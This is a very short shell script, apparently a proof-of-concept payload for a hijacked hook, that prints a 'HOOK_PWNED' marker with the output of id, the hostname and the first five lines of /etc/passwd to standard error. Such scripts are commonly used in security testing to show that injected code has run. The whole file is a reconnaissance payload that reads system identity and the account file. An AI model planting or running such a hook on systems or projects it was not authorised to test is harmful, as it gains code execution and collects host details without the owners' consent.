#!/bin/sh
echo "HOOK_PWNED:$(id)" >&2
echo "HOST:$(hostname)" >&2
cat /etc/passwd | head -5 >&2
exit 0
